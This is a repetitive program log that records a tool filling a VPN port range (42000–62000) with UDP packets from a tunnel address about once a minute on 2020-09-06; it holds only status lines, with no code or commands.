2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:31:04 -Starting port fill at 2020-09-06 13:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:32:06 -Starting port fill at 2020-09-06 13:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:33:04 -Starting port fill at 2020-09-06 13:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:34:05 -Starting port fill at 2020-09-06 13:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:35:05 -Starting port fill at 2020-09-06 13:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:36:06 -Starting port fill at 2020-09-06 13:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:37:05 -Starting port fill at 2020-09-06 13:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:38:05 -Starting port fill at 2020-09-06 13:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:39:05 -Starting port fill at 2020-09-06 13:40:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:40:07 -Starting port fill at 2020-09-06 13:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:41:05 -Starting port fill at 2020-09-06 13:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:42:04 -Starting port fill at 2020-09-06 13:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:43:04 -Starting port fill at 2020-09-06 13:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:44:04 -Starting port fill at 2020-09-06 13:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:45:06 -Starting port fill at 2020-09-06 13:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:46:04 -Starting port fill at 2020-09-06 13:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:47:06 -Starting port fill at 2020-09-06 13:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:48:04 -Starting port fill at 2020-09-06 13:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:49:06 -Starting port fill at 2020-09-06 13:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:50:04 -Starting port fill at 2020-09-06 13:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:51:04 -Starting port fill at 2020-09-06 13:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:52:04 -Starting port fill at 2020-09-06 13:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 13:53:05 -Starting port fill at 2020-09-06 13:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 13:54:07 -Starting port fill at 2020-09-06 13:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 